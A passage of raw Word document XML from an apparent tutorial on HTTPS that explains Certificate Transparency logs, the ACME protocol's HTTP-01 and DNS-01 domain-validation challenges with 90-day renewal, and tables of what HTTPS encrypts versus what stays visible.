      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How CT solves this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639953C9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>When a CA issues a certificate, it MUST submit it to multiple public CT logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C30288E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>CT logs are append-only, cryptographically verifiable (Merkle tree).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E907D98" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The CT log returns a Signed Certificate Timestamp (SCT).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782EF7EC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The SCT is embedded in the certificate (or provided via OCSP stapling or TLS extension).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEA126B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Browsers require valid SCTs — a certificate without CT log proof is rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD16C1C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Domain owners can MONITOR CT logs for any certificates issued for their domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2D54D3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> If a CA issues a rogue certificate, it appears in the public CT log → the domain owner (or automated monitors) detect it → the certificate is revoked, the CA is investigated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191BF6CD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.5 Let's Encrypt and ACME Protocol — How Automated Certificate Issuance Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D7C946" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ACME (Automatic Certificate Management Environment) protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5151621D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Account registration:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Client generates a key pair, registers with the CA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2DCAA7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Order creation:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Client requests a certificate for api.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C43386" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authorization challenges (prove domain control):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F960C3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP-01 challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680204CF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>CA says: "Place a file at http://api.example.com/.well-known/acme-challenge/&lt;token&gt; with content &lt;thumbprint&gt;."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307F6F96" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client places the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E8A709" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>CA's servers fetch the URL from multiple global locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5CBA12" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If successful → domain control proven.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135B080D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS-01 challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2650A773" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>CA says: "Create a TXT record: _acme-challenge.api.example.com with value &lt;token&gt;."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F34C09D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client creates the DNS record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CE3F12" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>CA queries DNS and verifies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74566F13" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Advantage: Works for wildcard certificates and when port 80 isn't accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F02E6E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Certificate issuance:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> CA signs the certificate, client downloads it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4331F59F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Renewal:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Certificates are valid for 90 days. Automated renewal runs at 60 days (30-day buffer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA8AF6C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why 90-day certificates are more secure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585EBA32" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="891"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Shorter window for a compromised key to be exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4519E2A9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="891"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Forces automation (manual renewal for 90-day certs is unsustainable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1946B6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="891"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Automated systems are more reliable than human-remembered annual renewals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBA7B60" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="31EA556A">
          <v:rect id="_x0000_i3979" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="161BE1C0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. What HTTPS Protects and How — Detailed Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B04E5A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 What's Encrypted (Invisible to Network Observers)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309"/>
        <w:gridCol w:w="3985"/>
        <w:gridCol w:w="2079"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="6693AEB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BAB719" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Component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0F2335" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>HTTP (Visible)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C67C19" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>HTTPS (Hidden)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="649FBD3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A3529D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Request URL path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A53596" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>/api/users/123?token=secret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05B28E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Encrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="0262659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29BED7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>HTTP method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8B273A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>GET, POST, etc.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6CD633" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Encrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="67DEE6E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DFACC5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Request headers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F3B86C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>All headers including cookies, auth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F6A9DA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Encrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="24BA896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4C725F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Request body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CC9389" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Form data, JSON, file uploads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44AD56" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Encrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="13FD1B7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36AB29" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Response 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50FCD8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>200 OK, 404 Not Found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009FBE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Encrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="0D8539E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143E42" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Response headers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A55E7D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Set-Cookie, content type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26CCA3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Encrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="56E6F18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0BC8C2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Response body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2192E5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>HTML, JSON, images, everything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0D1B8F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Encrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74CD7554" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 What's Still Visible Despite HTTPS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960"/>
        <w:gridCol w:w="1251"/>
        <w:gridCol w:w="3693"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="3ECC81A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1AFFD2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Component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D4C8C5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Visible?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271138" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
